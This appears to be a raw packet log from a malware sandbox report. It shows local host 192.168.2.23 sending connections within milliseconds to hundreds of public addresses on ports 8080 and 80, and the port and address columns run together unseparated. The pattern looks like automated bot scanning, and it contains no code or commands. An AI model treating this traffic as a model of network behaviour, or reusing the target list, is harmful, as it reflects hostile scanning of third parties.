                                                              Nov 13, 2023 22:17:57.728836060 CET139488080192.168.2.2362.195.81.228
                                                              Nov 13, 2023 22:17:57.728836060 CET139488080192.168.2.2394.252.183.1
                                                              Nov 13, 2023 22:17:57.728836060 CET139488080192.168.2.2331.224.240.76
                                                              Nov 13, 2023 22:17:57.728847027 CET139488080192.168.2.2385.29.228.67
                                                              Nov 13, 2023 22:17:57.728847027 CET139488080192.168.2.2394.178.129.253
                                                              Nov 13, 2023 22:17:57.728847027 CET139488080192.168.2.2385.66.155.30
                                                              Nov 13, 2023 22:17:57.728847027 CET139488080192.168.2.2394.72.77.26
                                                              Nov 13, 2023 22:17:57.728847027 CET139488080192.168.2.2394.110.62.89
                                                              Nov 13, 2023 22:17:57.728847027 CET139488080192.168.2.2362.93.215.158
                                                              Nov 13, 2023 22:17:57.728854895 CET139488080192.168.2.2362.58.61.82
                                                              Nov 13, 2023 22:17:57.728854895 CET139488080192.168.2.2394.142.124.175
                                                              Nov 13, 2023 22:17:57.728854895 CET139488080192.168.2.2394.188.23.22
                                                              Nov 13, 2023 22:17:57.728854895 CET139488080192.168.2.2331.36.215.3
                                                              Nov 13, 2023 22:17:57.728854895 CET139488080192.168.2.2331.83.59.9
                                                              Nov 13, 2023 22:17:57.728854895 CET139488080192.168.2.2362.235.109.215
                                                              Nov 13, 2023 22:17:57.728854895 CET1343680192.168.2.23112.12.98.139
                                                              Nov 13, 2023 22:17:57.728859901 CET139488080192.168.2.2394.33.8.79
                                                              Nov 13, 2023 22:17:57.728859901 CET139488080192.168.2.2395.169.248.23
                                                              Nov 13, 2023 22:17:57.728859901 CET139488080192.168.2.2362.188.219.189
                                                              Nov 13, 2023 22:17:57.728859901 CET139488080192.168.2.2394.215.144.130
                                                              Nov 13, 2023 22:17:57.728868008 CET139488080192.168.2.2385.44.200.155
                                                              Nov 13, 2023 22:17:57.728868008 CET139488080192.168.2.2385.109.121.181
                                                              Nov 13, 2023 22:17:57.728868008 CET139488080192.168.2.2394.113.19.73
                                                              Nov 13, 2023 22:17:57.728868008 CET139488080192.168.2.2331.124.41.98
                                                              Nov 13, 2023 22:17:57.728868008 CET139488080192.168.2.2331.68.195.135
                                                              Nov 13, 2023 22:17:57.728868008 CET139488080192.168.2.2362.217.52.237
                                                              Nov 13, 2023 22:17:57.728921890 CET139488080192.168.2.2331.72.181.17
                                                              Nov 13, 2023 22:17:57.728930950 CET139488080192.168.2.2395.90.167.85
                                                              Nov 13, 2023 22:17:57.728935003 CET139488080192.168.2.2331.244.6.152
                                                              Nov 13, 2023 22:17:57.728936911 CET139488080192.168.2.2385.238.219.225
                                                              Nov 13, 2023 22:17:57.728936911 CET139488080192.168.2.2394.149.76.14
                                                              Nov 13, 2023 22:17:57.728940010 CET139488080192.168.2.2362.184.38.53
                                                              Nov 13, 2023 22:17:57.728940010 CET139488080192.168.2.2394.181.121.43
                                                              Nov 13, 2023 22:17:57.728943110 CET139488080192.168.2.2331.85.150.136
                                                              Nov 13, 2023 22:17:57.728943110 CET139488080192.168.2.2385.194.94.107
                                                              Nov 13, 2023 22:17:57.728943110 CET1343680192.168.2.23112.140.128.195
                                                              Nov 13, 2023 22:17:57.728950024 CET139488080192.168.2.2395.182.86.51
                                                              Nov 13, 2023 22:17:57.728950977 CET139488080192.168.2.2385.151.125.82
                                                              Nov 13, 2023 22:17:57.728982925 CET139488080192.168.2.2394.70.118.156
                                                              Nov 13, 2023 22:17:57.728982925 CET139488080192.168.2.2395.149.218.185
                                                              Nov 13, 2023 22:17:57.728982925 CET139488080192.168.2.2385.230.160.24
                                                              Nov 13, 2023 22:17:57.728982925 CET1343680192.168.2.23112.148.12.10
                                                              Nov 13, 2023 22:17:57.728982925 CET139488080192.168.2.2362.218.41.130
                                                              Nov 13, 2023 22:17:57.728982925 CET1343680192.168.2.23112.6.25.115
                                                              Nov 13, 2023 22:17:57.728982925 CET1343680192.168.2.23112.4.92.163
                                                              Nov 13, 2023 22:17:57.728984118 CET139488080192.168.2.2331.195.47.216
                                                              Nov 13, 2023 22:17:57.728991985 CET1343680192.168.2.23112.57.135.21
                                                              Nov 13, 2023 22:17:57.728996038 CET1343680192.168.2.23112.125.189.106
                                                              Nov 13, 2023 22:17:57.728996992 CET139488080192.168.2.2362.117.99.195
                                                              Nov 13, 2023 22:17:57.729000092 CET1343680192.168.2.23112.246.195.131
                                                              Nov 13, 2023 22:17:57.729001045 CET139488080192.168.2.2394.209.157.236
                                                              Nov 13, 2023 22:17:57.729000092 CET139488080192.168.2.2362.118.100.253
                                                              Nov 13, 2023 22:17:57.729000092 CET139488080192.168.2.2362.118.136.24
                                                              Nov 13, 2023 22:17:57.729000092 CET139488080192.168.2.2331.22.39.9
                                                              Nov 13, 2023 22:17:57.729008913 CET139488080192.168.2.2362.221.184.225
                                                              Nov 13, 2023 22:17:57.729008913 CET139488080192.168.2.2385.60.153.168
                                                              Nov 13, 2023 22:17:57.729018927 CET139488080192.168.2.2362.162.106.157
                                                              Nov 13, 2023 22:17:57.729021072 CET139488080192.168.2.2394.81.51.14
                                                              Nov 13, 2023 22:17:57.729031086 CET139488080192.168.2.2362.250.2.144
                                                              Nov 13, 2023 22:17:57.729031086 CET1343680192.168.2.23112.27.74.20
                                                              Nov 13, 2023 22:17:57.729031086 CET139488080192.168.2.2394.43.116.147
                                                              Nov 13, 2023 22:17:57.729033947 CET139488080192.168.2.2394.39.76.201
                                                              Nov 13, 2023 22:17:57.729034901 CET139488080192.168.2.2331.180.168.91
                                                              Nov 13, 2023 22:17:57.729038000 CET139488080192.168.2.2362.38.166.75
                                                              Nov 13, 2023 22:17:57.729034901 CET139488080192.168.2.2331.249.25.233
                                                              Nov 13, 2023 22:17:57.729038000 CET139488080192.168.2.2395.241.76.225
                                                              Nov 13, 2023 22:17:57.729041100 CET1343680192.168.2.23112.117.220.219
                                                              Nov 13, 2023 22:17:57.729043961 CET1343680192.168.2.23112.18.193.254
                                                              Nov 13, 2023 22:17:57.729051113 CET139488080192.168.2.2331.120.186.23
                                                              Nov 13, 2023 22:17:57.729053020 CET139488080192.168.2.2362.162.156.162
                                                              Nov 13, 2023 22:17:57.729058027 CET1343680192.168.2.23112.3.172.194
                                                              Nov 13, 2023 22:17:57.729063988 CET139488080192.168.2.2395.80.187.102
                                                              Nov 13, 2023 22:17:57.729063988 CET139488080192.168.2.2385.108.198.224
                                                              Nov 13, 2023 22:17:57.729063988 CET139488080192.168.2.2331.155.58.243
                                                              Nov 13, 2023 22:17:57.729067087 CET139488080192.168.2.2331.252.130.198
                                                              Nov 13, 2023 22:17:57.729069948 CET139488080192.168.2.2385.181.180.73
                                                              Nov 13, 2023 22:17:57.729069948 CET139488080192.168.2.2394.113.251.112
                                                              Nov 13, 2023 22:17:57.729079008 CET139488080192.168.2.2331.253.33.240
                                                              Nov 13, 2023 22:17:57.729079008 CET139488080192.168.2.2385.185.115.40
                                                              Nov 13, 2023 22:17:57.729084015 CET139488080192.168.2.2394.63.150.209
                                                              Nov 13, 2023 22:17:57.729087114 CET139488080192.168.2.2394.33.167.36
                                                              Nov 13, 2023 22:17:57.729087114 CET139488080192.168.2.2385.85.196.90
                                                              Nov 13, 2023 22:17:57.729108095 CET139488080192.168.2.2385.79.64.25
                                                              Nov 13, 2023 22:17:57.729110003 CET139488080192.168.2.2362.231.213.188
                                                              Nov 13, 2023 22:17:57.729114056 CET139488080192.168.2.2394.7.255.66
                                                              Nov 13, 2023 22:17:57.729114056 CET139488080192.168.2.2385.186.49.213
                                                              Nov 13, 2023 22:17:57.729116917 CET139488080192.168.2.2394.205.213.157
                                                              Nov 13, 2023 22:17:57.729188919 CET139488080192.168.2.2394.119.161.112
                                                              Nov 13, 2023 22:17:57.729188919 CET1343680192.168.2.23112.96.248.35
                                                              Nov 13, 2023 22:17:57.729201078 CET139488080192.168.2.2395.164.199.9
                                                              Nov 13, 2023 22:17:57.729201078 CET139488080192.168.2.2395.29.217.165
                                                              Nov 13, 2023 22:17:57.729201078 CET139488080192.168.2.2395.25.145.201
                                                              Nov 13, 2023 22:17:57.729203939 CET139488080192.168.2.2385.215.131.130
                                                              Nov 13, 2023 22:17:57.729204893 CET139488080192.168.2.2331.191.137.68
                                                              Nov 13, 2023 22:17:57.729204893 CET139488080192.168.2.2395.11.229.61
                                                              Nov 13, 2023 22:17:57.729204893 CET139488080192.168.2.2385.225.53.142
                                                              Nov 13, 2023 22:17:57.729206085 CET139488080192.168.2.2362.120.87.112
                                                              Nov 13, 2023 22:17:57.729206085 CET139488080192.168.2.2362.151.67.10
                                                              Nov 13, 2023 22:17:57.729206085 CET139488080192.168.2.2331.3.82.9
                                                              Nov 13, 2023 22:17:57.729206085 CET139488080192.168.2.2394.255.146.66
                                                              Nov 13, 2023 22:17:57.729206085 CET139488080192.168.2.2395.43.124.178
                                                              Nov 13, 2023 22:17:57.729206085 CET139488080192.168.2.2331.123.191.56
                                                              Nov 13, 2023 22:17:57.729211092 CET139488080192.168.2.2394.225.128.201
                                                              Nov 13, 2023 22:17:57.729211092 CET139488080192.168.2.2331.132.164.52
                                                              Nov 13, 2023 22:17:57.729211092 CET139488080192.168.2.2362.168.68.128
                                                              Nov 13, 2023 22:17:57.729211092 CET139488080192.168.2.2394.114.129.188
                                                              Nov 13, 2023 22:17:57.729218006 CET139488080192.168.2.2385.246.185.39
                                                              Nov 13, 2023 22:17:57.729218006 CET139488080192.168.2.2395.35.35.179
                                                              Nov 13, 2023 22:17:57.729218006 CET1343680192.168.2.23112.247.193.48
                                                              Nov 13, 2023 22:17:57.729219913 CET139488080192.168.2.2395.48.48.141
                                                              Nov 13, 2023 22:17:57.729219913 CET139488080192.168.2.2395.101.223.207
                                                              Nov 13, 2023 22:17:57.729219913 CET139488080192.168.2.2331.119.74.131
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2331.95.14.197
                                                              Nov 13, 2023 22:17:57.729223967 CET1343680192.168.2.23112.162.93.77
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2385.73.253.194
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2331.92.32.232
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2385.145.164.127
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2331.13.227.193
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2362.240.237.13
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2395.161.153.93
                                                              Nov 13, 2023 22:17:57.729223967 CET139488080192.168.2.2385.66.14.180
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2394.14.20.181
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2395.4.4.194
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2395.73.216.38
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2362.172.115.234
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2385.242.60.131
                                                              Nov 13, 2023 22:17:57.729233980 CET1343680192.168.2.23112.41.22.171
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2395.132.81.40
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2385.155.198.14
                                                              Nov 13, 2023 22:17:57.729231119 CET139488080192.168.2.2331.218.171.114
                                                              Nov 13, 2023 22:17:57.729233980 CET139488080192.168.2.2331.3.6.79
                                                              Nov 13, 2023 22:17:57.729249954 CET139488080192.168.2.2395.80.230.200
                                                              Nov 13, 2023 22:17:57.729249954 CET139488080192.168.2.2385.28.156.101
                                                              Nov 13, 2023 22:17:57.729249954 CET139488080192.168.2.2385.119.23.107
                                                              Nov 13, 2023 22:17:57.729249954 CET1343680192.168.2.23112.164.10.233
                                                              Nov 13, 2023 22:17:57.729249954 CET139488080192.168.2.2385.12.183.40
                                                              Nov 13, 2023 22:17:57.729259014 CET139488080192.168.2.2395.168.101.42
                                                              Nov 13, 2023 22:17:57.729259014 CET139488080192.168.2.2395.14.145.131
                                                              Nov 13, 2023 22:17:57.729259014 CET139488080192.168.2.2394.73.183.188
                                                              Nov 13, 2023 22:17:57.729259014 CET139488080192.168.2.2362.155.254.195
                                                              Nov 13, 2023 22:17:57.729266882 CET139488080192.168.2.2331.188.144.135
                                                              Nov 13, 2023 22:17:57.729266882 CET1343680192.168.2.23112.227.235.232
                                                              Nov 13, 2023 22:17:57.729280949 CET139488080192.168.2.2331.84.16.0
                                                              Nov 13, 2023 22:17:57.729280949 CET139488080192.168.2.2331.158.99.67
                                                              Nov 13, 2023 22:17:57.729280949 CET139488080192.168.2.2394.9.183.7
                                                              Nov 13, 2023 22:17:57.729280949 CET139488080192.168.2.2362.231.209.7
                                                              Nov 13, 2023 22:17:57.729301929 CET139488080192.168.2.2395.208.102.128
                                                              Nov 13, 2023 22:17:57.729301929 CET139488080192.168.2.2362.204.107.184
                                                              Nov 13, 2023 22:17:57.729301929 CET139488080192.168.2.2362.60.169.47
                                                              Nov 13, 2023 22:17:57.729301929 CET139488080192.168.2.2362.76.139.42
                                                              Nov 13, 2023 22:17:57.729301929 CET139488080192.168.2.2385.118.123.24
                                                              Nov 13, 2023 22:17:57.729326010 CET139488080192.168.2.2395.248.66.238
                                                              Nov 13, 2023 22:17:57.729326010 CET139488080192.168.2.2331.196.72.223
                                                              Nov 13, 2023 22:17:57.729326010 CET139488080192.168.2.2362.135.178.158
                                                              Nov 13, 2023 22:17:57.729331970 CET139488080192.168.2.2394.161.220.131
                                                              Nov 13, 2023 22:17:57.729331970 CET139488080192.168.2.2394.255.191.237
                                                              Nov 13, 2023 22:17:57.729332924 CET139488080192.168.2.2331.151.107.85
                                                              Nov 13, 2023 22:17:57.729331970 CET1343680192.168.2.23112.157.168.38
                                                              Nov 13, 2023 22:17:57.729332924 CET139488080192.168.2.2331.97.73.0
                                                              Nov 13, 2023 22:17:57.729332924 CET1343680192.168.2.23112.20.69.199
                                                              Nov 13, 2023 22:17:57.729341030 CET139488080192.168.2.2331.249.66.233
                                                              Nov 13, 2023 22:17:57.729341030 CET139488080192.168.2.2385.151.139.109
                                                              Nov 13, 2023 22:17:57.729341030 CET139488080192.168.2.2362.168.235.249
                                                              Nov 13, 2023 22:17:57.729341030 CET139488080192.168.2.2395.47.33.14
                                                              Nov 13, 2023 22:17:57.729362965 CET139488080192.168.2.2362.159.120.69
                                                              Nov 13, 2023 22:17:57.729373932 CET1343680192.168.2.23112.120.154.29
                                                              Nov 13, 2023 22:17:57.729373932 CET139488080192.168.2.2362.113.251.148
                                                              Nov 13, 2023 22:17:57.729373932 CET139488080192.168.2.2385.202.203.88
                                                              Nov 13, 2023 22:17:57.729376078 CET139488080192.168.2.2331.156.130.16
                                                              Nov 13, 2023 22:17:57.729376078 CET139488080192.168.2.2395.92.184.116
                                                              Nov 13, 2023 22:17:57.729376078 CET1343680192.168.2.23112.130.159.84
                                                              Nov 13, 2023 22:17:57.729376078 CET139488080192.168.2.2385.129.101.125
                                                              Nov 13, 2023 22:17:57.729376078 CET139488080192.168.2.2394.255.146.49
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2394.34.210.218
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2394.207.7.0
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2395.37.124.202
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2385.190.147.150
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2331.230.157.1
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2362.165.31.79
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2362.201.71.131
                                                              Nov 13, 2023 22:17:57.729382992 CET139488080192.168.2.2394.138.55.109
                                                              Nov 13, 2023 22:17:57.729387045 CET139488080192.168.2.2395.92.252.72
                                                              Nov 13, 2023 22:17:57.729403019 CET1343680192.168.2.23112.228.132.102
                                                              Nov 13, 2023 22:17:57.729408979 CET139488080192.168.2.2362.175.101.141
                                                              Nov 13, 2023 22:17:57.729417086 CET139488080192.168.2.2394.146.58.172
                                                              Nov 13, 2023 22:17:57.729418993 CET139488080192.168.2.2331.50.214.166
                                                              Nov 13, 2023 22:17:57.729422092 CET139488080192.168.2.2362.32.213.246
                                                              Nov 13, 2023 22:17:57.729429960 CET139488080192.168.2.2331.54.99.208
                                                              Nov 13, 2023 22:17:57.729429960 CET139488080192.168.2.2385.201.186.28
                                                              Nov 13, 2023 22:17:57.729429960 CET1343680192.168.2.23112.191.178.251
                                                              Nov 13, 2023 22:17:57.729429960 CET139488080192.168.2.2331.77.55.136
                                                              Nov 13, 2023 22:17:57.729439020 CET139488080192.168.2.2362.80.134.31
                                                              Nov 13, 2023 22:17:57.729441881 CET139488080192.168.2.2394.86.106.5
                                                              Nov 13, 2023 22:17:57.729441881 CET139488080192.168.2.2385.87.36.11
                                                              Nov 13, 2023 22:17:57.729450941 CET139488080192.168.2.2362.53.236.120
                                                              Nov 13, 2023 22:17:57.729454994 CET139488080192.168.2.2385.189.57.64
                                                              Nov 13, 2023 22:17:57.729460955 CET139488080192.168.2.2331.45.111.157
                                                              Nov 13, 2023 22:17:57.729461908 CET1343680192.168.2.23112.182.2.247
                                                              Nov 13, 2023 22:17:57.729465008 CET139488080192.168.2.2331.129.23.220
                                                              Nov 13, 2023 22:17:57.729460955 CET139488080192.168.2.2395.41.164.113
                                                              Nov 13, 2023 22:17:57.729471922 CET139488080192.168.2.2385.251.167.179
                                                              Nov 13, 2023 22:17:57.729482889 CET139488080192.168.2.2385.200.144.81
                                                              Nov 13, 2023 22:17:57.729485035 CET139488080192.168.2.2362.185.57.46
                                                              Nov 13, 2023 22:17:57.729485989 CET1343680192.168.2.23112.177.10.138
                                                              Nov 13, 2023 22:17:57.729497910 CET139488080192.168.2.2331.93.223.157
                                                              Nov 13, 2023 22:17:57.729517937 CET139488080192.168.2.2362.160.157.100
                                                              Nov 13, 2023 22:17:57.729517937 CET1343680192.168.2.23112.158.178.236
                                                              Nov 13, 2023 22:17:57.729525089 CET139488080192.168.2.2394.143.70.51
                                                              Nov 13, 2023 22:17:57.729525089 CET139488080192.168.2.2394.166.185.158
                                                              Nov 13, 2023 22:17:57.729525089 CET139488080192.168.2.2395.217.163.199
                                                              Nov 13, 2023 22:17:57.729542017 CET139488080192.168.2.2394.251.14.182
                                                              Nov 13, 2023 22:17:57.729542971 CET1343680192.168.2.23112.147.206.79
                                                              Nov 13, 2023 22:17:57.729542971 CET139488080192.168.2.2395.245.60.207
                                                              Nov 13, 2023 22:17:57.729600906 CET139488080192.168.2.2385.219.128.111
                                                              Nov 13, 2023 22:17:57.729614973 CET139488080192.168.2.2394.41.43.122
                                                              Nov 13, 2023 22:17:57.729614973 CET139488080192.168.2.2362.43.58.215
                                                              Nov 13, 2023 22:17:57.729614973 CET139488080192.168.2.2395.171.107.52
                                                              Nov 13, 2023 22:17:57.729614973 CET139488080192.168.2.2331.78.194.81
                                                              Nov 13, 2023 22:17:57.729624033 CET139488080192.168.2.2385.3.142.81
                                                              Nov 13, 2023 22:17:57.729624033 CET139488080192.168.2.2331.73.158.102
                                                              Nov 13, 2023 22:17:57.729624987 CET139488080192.168.2.2395.140.1.8
                                                              Nov 13, 2023 22:17:57.729624033 CET139488080192.168.2.2395.8.178.220
                                                              Nov 13, 2023 22:17:57.729625940 CET1343680192.168.2.23112.246.212.27
                                                              Nov 13, 2023 22:17:57.729624987 CET139488080192.168.2.2362.111.158.132
                                                              Nov 13, 2023 22:17:57.729628086 CET139488080192.168.2.2385.210.112.229
                                                              Nov 13, 2023 22:17:57.729624987 CET139488080192.168.2.2385.196.129.14
                                                              Nov 13, 2023 22:17:57.729625940 CET139488080192.168.2.2395.189.167.163
                                                              Nov 13, 2023 22:17:57.729628086 CET139488080192.168.2.2385.2.76.138
                                                              Nov 13, 2023 22:17:57.729625940 CET139488080192.168.2.2394.13.170.71
                                                              Nov 13, 2023 22:17:57.729628086 CET139488080192.168.2.2395.228.120.180
                                                              Nov 13, 2023 22:17:57.729628086 CET139488080192.168.2.2385.245.125.182
                                                              Nov 13, 2023 22:17:57.729628086 CET139488080192.168.2.2394.157.34.45
                                                              Nov 13, 2023 22:17:57.729628086 CET139488080192.168.2.2385.234.88.115
                                                              Nov 13, 2023 22:17:57.729628086 CET139488080192.168.2.2395.199.191.144
                                                              Nov 13, 2023 22:17:57.729634047 CET139488080192.168.2.2394.59.92.167
                                                              Nov 13, 2023 22:17:57.729634047 CET139488080192.168.2.2395.234.141.239
                                                              Nov 13, 2023 22:17:57.729634047 CET139488080192.168.2.2362.56.157.60
                                                              Nov 13, 2023 22:17:57.729635954 CET139488080192.168.2.2331.84.208.147
                                                              Nov 13, 2023 22:17:57.729635954 CET139488080192.168.2.2395.236.245.198
                                                              Nov 13, 2023 22:17:57.729635954 CET139488080192.168.2.2331.254.35.8
                                                              Nov 13, 2023 22:17:57.729635954 CET139488080192.168.2.2385.199.139.213
                                                              Nov 13, 2023 22:17:57.729648113 CET139488080192.168.2.2331.72.243.126
                                                              Nov 13, 2023 22:17:57.729648113 CET139488080192.168.2.2395.106.109.194
                                                              Nov 13, 2023 22:17:57.729657888 CET139488080192.168.2.2362.252.80.106
                                                              Nov 13, 2023 22:17:57.729657888 CET139488080192.168.2.2394.29.8.94
                                                              Nov 13, 2023 22:17:57.729657888 CET1343680192.168.2.23112.231.77.155
                                                              Nov 13, 2023 22:17:57.729657888 CET139488080192.168.2.2395.132.42.131
                                                              Nov 13, 2023 22:17:57.729657888 CET139488080192.168.2.2395.240.97.117
                                                              Nov 13, 2023 22:17:57.729669094 CET139488080192.168.2.2362.164.107.229
                                                              Nov 13, 2023 22:17:57.729669094 CET139488080192.168.2.2331.81.248.176
                                                              Nov 13, 2023 22:17:57.729669094 CET139488080192.168.2.2394.98.112.141
                                                              Nov 13, 2023 22:17:57.729669094 CET139488080192.168.2.2331.214.170.56
                                                              Nov 13, 2023 22:17:57.729669094 CET139488080192.168.2.2395.98.20.33
                                                              Nov 13, 2023 22:17:57.729669094 CET139488080192.168.2.2331.12.37.149
                                                              Nov 13, 2023 22:17:57.729674101 CET139488080192.168.2.2394.12.230.24
                                                              Nov 13, 2023 22:17:57.729674101 CET1343680192.168.2.23112.242.88.105
                                                              Nov 13, 2023 22:17:57.729674101 CET139488080192.168.2.2362.83.128.118
                                                              Nov 13, 2023 22:17:57.729674101 CET139488080192.168.2.2395.169.59.166
                                                              Nov 13, 2023 22:17:57.729674101 CET139488080192.168.2.2395.216.6.173
                                                              Nov 13, 2023 22:17:57.729684114 CET139488080192.168.2.2385.225.181.51
                                                              Nov 13, 2023 22:17:57.729684114 CET139488080192.168.2.2385.27.201.151
                                                              Nov 13, 2023 22:17:57.729684114 CET139488080192.168.2.2394.15.97.157
                                                              Nov 13, 2023 22:17:57.729684114 CET139488080192.168.2.2394.52.110.191
                                                              Nov 13, 2023 22:17:57.729686022 CET139488080192.168.2.2331.78.95.176
                                                              Nov 13, 2023 22:17:57.729686022 CET139488080192.168.2.2331.110.159.11
                                                              Nov 13, 2023 22:17:57.729686022 CET139488080192.168.2.2362.4.242.30
                                                              Nov 13, 2023 22:17:57.729691029 CET139488080192.168.2.2385.116.66.150
                                                              Nov 13, 2023 22:17:57.729691029 CET139488080192.168.2.2394.55.67.183
                                                              Nov 13, 2023 22:17:57.729691029 CET139488080192.168.2.2394.188.81.13
                                                              Nov 13, 2023 22:17:57.729696035 CET1343680192.168.2.23112.97.29.130
                                                              Nov 13, 2023 22:17:57.729703903 CET1343680192.168.2.23112.135.11.197
                                                              Nov 13, 2023 22:17:57.729703903 CET139488080192.168.2.2395.225.108.172
                                                              Nov 13, 2023 22:17:57.729703903 CET139488080192.168.2.2362.65.49.100
                                                              Nov 13, 2023 22:17:57.729703903 CET139488080192.168.2.2394.139.214.68
                                                              Nov 13, 2023 22:17:57.729713917 CET139488080192.168.2.2395.190.218.202
                                                              Nov 13, 2023 22:17:57.729713917 CET139488080192.168.2.2394.131.26.37
                                                              Nov 13, 2023 22:17:57.729717016 CET139488080192.168.2.2385.147.115.69
                                                              Nov 13, 2023 22:17:57.729717016 CET139488080192.168.2.2395.24.198.89
                                                              Nov 13, 2023 22:17:57.729727030 CET139488080192.168.2.2395.153.88.6
                                                              Nov 13, 2023 22:17:57.729732990 CET139488080192.168.2.2394.54.91.113
                                                              Nov 13, 2023 22:17:57.729734898 CET139488080192.168.2.2362.182.207.43
                                                              Nov 13, 2023 22:17:57.729734898 CET139488080192.168.2.2385.93.131.36
                                                              Nov 13, 2023 22:17:57.729734898 CET139488080192.168.2.2362.83.195.106
                                                              Nov 13, 2023 22:17:57.729734898 CET1343680192.168.2.23112.106.124.162
                                                              Nov 13, 2023 22:17:57.729739904 CET1343680192.168.2.23112.115.144.124
                                                              Nov 13, 2023 22:17:57.729748011 CET139488080192.168.2.2385.6.140.60
                                                              Nov 13, 2023 22:17:57.729756117 CET1343680192.168.2.23112.60.228.137
                                                              Nov 13, 2023 22:17:57.729763031 CET139488080192.168.2.2394.204.183.18
                                                              Nov 13, 2023 22:17:57.729765892 CET139488080192.168.2.2362.93.102.123
                                                              Nov 13, 2023 22:17:57.729774952 CET139488080192.168.2.2394.132.2.74
                                                              Nov 13, 2023 22:17:57.729777098 CET139488080192.168.2.2395.70.94.232
                                                              Nov 13, 2023 22:17:57.729785919 CET139488080192.168.2.2395.239.183.150
                                                              Nov 13, 2023 22:17:57.729799986 CET139488080192.168.2.2362.86.37.248
                                                              Nov 13, 2023 22:17:57.729799986 CET139488080192.168.2.2394.166.185.235
                                                              Nov 13, 2023 22:17:57.729804993 CET1343680192.168.2.23112.86.14.161
                                                              Nov 13, 2023 22:17:57.729804993 CET139488080192.168.2.2385.16.215.174
                                                              Nov 13, 2023 22:17:57.729804993 CET139488080192.168.2.2394.89.98.235
                                                              Nov 13, 2023 22:17:57.729815960 CET139488080192.168.2.2385.3.235.60
                                                              Nov 13, 2023 22:17:57.729825974 CET139488080192.168.2.2394.138.90.104
                                                              Nov 13, 2023 22:17:57.729829073 CET139488080192.168.2.2331.185.89.9
                                                              Nov 13, 2023 22:17:57.729851007 CET139488080192.168.2.2362.38.52.139
                                                              Nov 13, 2023 22:17:57.729852915 CET139488080192.168.2.2395.36.7.174
                                                              Nov 13, 2023 22:17:57.729854107 CET1343680192.168.2.23112.119.179.170
                                                              Nov 13, 2023 22:17:57.729855061 CET139488080192.168.2.2331.101.232.169
                                                              Nov 13, 2023 22:17:57.729855061 CET139488080192.168.2.2362.18.129.116
                                                              Nov 13, 2023 22:17:57.729862928 CET139488080192.168.2.2362.114.102.39
                                                              Nov 13, 2023 22:17:57.729866982 CET1343680192.168.2.23112.30.69.247
                                                              Nov 13, 2023 22:17:57.729882002 CET139488080192.168.2.2394.58.123.48
                                                              Nov 13, 2023 22:17:57.729882002 CET139488080192.168.2.2362.222.181.176
                                                              Nov 13, 2023 22:17:57.729882956 CET139488080192.168.2.2394.176.79.66
                                                              Nov 13, 2023 22:17:57.729885101 CET139488080192.168.2.2394.24.80.137
                                                              Nov 13, 2023 22:17:57.729885101 CET139488080192.168.2.2395.237.251.29
                                                              Nov 13, 2023 22:17:57.729887009 CET139488080192.168.2.2394.53.200.133
                                                              Nov 13, 2023 22:17:57.729898930 CET139488080192.168.2.2362.142.171.198
                                                              Nov 13, 2023 22:17:57.729901075 CET139488080192.168.2.2331.81.56.118
                                                              Nov 13, 2023 22:17:57.729902983 CET139488080192.168.2.2331.62.43.160
                                                              Nov 13, 2023 22:17:57.729913950 CET139488080192.168.2.2362.71.112.245
                                                              Nov 13, 2023 22:17:57.729916096 CET139488080192.168.2.2385.175.43.204
                                                              Nov 13, 2023 22:17:57.729928970 CET139488080192.168.2.2362.170.62.12
                                                              Nov 13, 2023 22:17:57.729928970 CET1343680192.168.2.23112.166.184.67
                                                              Nov 13, 2023 22:17:57.729945898 CET139488080192.168.2.2331.6.24.31
                                                              Nov 13, 2023 22:17:57.729949951 CET1343680192.168.2.23112.80.199.69
                                                              Nov 13, 2023 22:17:57.729950905 CET139488080192.168.2.2331.240.137.74
                                                              Nov 13, 2023 22:17:57.729954004 CET139488080192.168.2.2385.132.44.172
                                                              Nov 13, 2023 22:17:57.729960918 CET139488080192.168.2.2394.196.243.168
                                                              Nov 13, 2023 22:17:57.729965925 CET139488080192.168.2.2395.153.14.135
                                                              Nov 13, 2023 22:17:57.729969978 CET139488080192.168.2.2394.125.15.153
                                                              Nov 13, 2023 22:17:57.729969978 CET139488080192.168.2.2385.108.49.157
                                                              Nov 13, 2023 22:17:57.729975939 CET1343680192.168.2.23112.233.61.242
                                                              Nov 13, 2023 22:17:57.729976892 CET139488080192.168.2.2331.57.40.154
                                                              Nov 13, 2023 22:17:57.729976892 CET139488080192.168.2.2395.82.81.101
                                                              Nov 13, 2023 22:17:57.729994059 CET139488080192.168.2.2394.179.135.109
                                                              Nov 13, 2023 22:17:57.729995966 CET139488080192.168.2.2395.220.217.20
                                                              Nov 13, 2023 22:17:57.730006933 CET1343680192.168.2.23112.162.247.183
                                                              Nov 13, 2023 22:17:57.730011940 CET139488080192.168.2.2394.165.73.230
                                                              Nov 13, 2023 22:17:57.730011940 CET139488080192.168.2.2395.253.14.93
                                                              Nov 13, 2023 22:17:57.730012894 CET139488080192.168.2.2394.78.179.31
                                                              Nov 13, 2023 22:17:57.730030060 CET139488080192.168.2.2385.176.225.114
                                                              Nov 13, 2023 22:17:57.730030060 CET139488080192.168.2.2331.20.239.42
                                                              Nov 13, 2023 22:17:57.730032921 CET139488080192.168.2.2331.84.65.175
